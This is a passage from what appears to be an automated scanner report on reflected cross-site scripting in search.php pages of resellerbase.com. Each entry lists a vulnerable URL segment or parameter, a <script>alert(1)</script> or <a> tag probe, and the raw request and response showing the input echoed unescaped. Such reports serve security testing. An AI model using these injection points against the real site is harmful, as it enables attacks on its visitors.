Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&6bdfd<script>alert(1)</script>a419029783f=1 was not found on this server.</p>
...[SNIP]...

2.3149. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c3113<a>3a8b98bd2c6 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2c3113<a>3a8b98bd2c6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2c3113<a>3a8b98bd2c6 was not found on this server.</p>
...[SNIP]...

2.3150. http://www.resellerbase.com/detail/44/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3e50f<script>alert(1)</script>c24f9ba5ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3e50f<script>alert(1)</script>c24f9ba5ae/44/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3e50f<script>alert(1)</script>c24f9ba5ae/44/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3151. http://www.resellerbase.com/detail/44/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 898e2<script>alert(1)</script>9ee2f98beaa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44898e2<script>alert(1)</script>9ee2f98beaa/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44898e2<script>alert(1)</script>9ee2f98beaa/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3152. http://www.resellerbase.com/detail/44/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9f9e6<script>alert(1)</script>b244ace9e69 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes9f9e6<script>alert(1)</script>b244ace9e69/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes9f9e6<script>alert(1)</script>b244ace9e69/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3153. http://www.resellerbase.com/detail/44/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 601be<script>alert(1)</script>f1fbb146bd5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos601be<script>alert(1)</script>f1fbb146bd5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos601be<script>alert(1)</script>f1fbb146bd5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3154. http://www.resellerbase.com/detail/44/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a25d3<script>alert(1)</script>be23dc94ff5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/search.phpa25d3<script>alert(1)</script>be23dc94ff5?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/search.phpa25d3<script>alert(1)</script>be23dc94ff5?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3155. http://www.resellerbase.com/detail/44/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 8130c<a>ef9af945079 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/kosmos/search.php?keyword=search...&Submit3=Search8130c<a>ef9af945079&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/search.php?keyword=search...&Submit3=Search8130c<a>ef9af945079&opt=2 was not found on this server.</p>
...[SNIP]...

2.3156. http://www.resellerbase.com/detail/44/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 6d896<a>1b63a3c3cdf was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/kosmos/search.php?keyword=search...6d896<a>1b63a3c3cdf&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/search.php?keyword=search...6d896<a>1b63a3c3cdf&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3157. http://www.resellerbase.com/detail/44/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cc837<script>alert(1)</script>8ce30157717 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&cc837<script>alert(1)</script>8ce30157717=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&cc837<script>alert(1)</script>8ce30157717=1 was not found on this server.</p>
...[SNIP]...

2.3158. http://www.resellerbase.com/detail/44/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 27c45<a>284114a16f1 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=227c45<a>284114a16f1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=227c45<a>284114a16f1 was not found on this server.</p>
...[SNIP]...

2.3159. http://www.resellerbase.com/detail/44/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e8720<script>alert(1)</script>2b55cc36b9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile8720<script>alert(1)</script>2b55cc36b9d/44/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile8720<script>alert(1)</script>2b55cc36b9d/44/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3160. http://www.resellerbase.com/detail/44/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 424be<script>alert(1)</script>5b653e333e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44424be<script>alert(1)</script>5b653e333e9/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44424be<script>alert(1)</script>5b653e333e9/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3161. http://www.resellerbase.com/detail/44/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7fe78<script>alert(1)</script>a807717cd4c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes7fe78<script>alert(1)</script>a807717cd4c/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes7fe78<script>alert(1)</script>a807717cd4c/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3162. http://www.resellerbase.com/detail/44/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 306c2<script>alert(1)</script>bf8417192ad was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/search.php306c2<script>alert(1)</script>bf8417192ad?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/search.php306c2<script>alert(1)</script>bf8417192ad?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3163. http://www.resellerbase.com/detail/44/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d84b2<a>c811f1e5cbe was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/search.php?keyword=search...&Submit3=Searchd84b2<a>c811f1e5cbe&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/search.php?keyword=search...&Submit3=Searchd84b2<a>c811f1e5cbe&opt=2 was not found on this server.</p>
...[SNIP]...

2.3164. http://www.resellerbase.com/detail/44/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a07de<a>5de06d86252 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/search.php?keyword=search...a07de<a>5de06d86252&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/search.php?keyword=search...a07de<a>5de06d86252&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3165. http://www.resellerbase.com/detail/44/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3afe7<script>alert(1)</script>75e451d395d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/search.php?keyword=search...&Submit3=Search&opt=2&3afe7<script>alert(1)</script>75e451d395d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/search.php?keyword=search...&Submit3=Search&opt=2&3afe7<script>alert(1)</script>75e451d395d=1 was not found on this server.</p>
...[SNIP]...

2.3166. http://www.resellerbase.com/detail/44/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload fe502<a>d49b7bb9fe8 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/search.php?keyword=search...&Submit3=Search&opt=2fe502<a>d49b7bb9fe8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

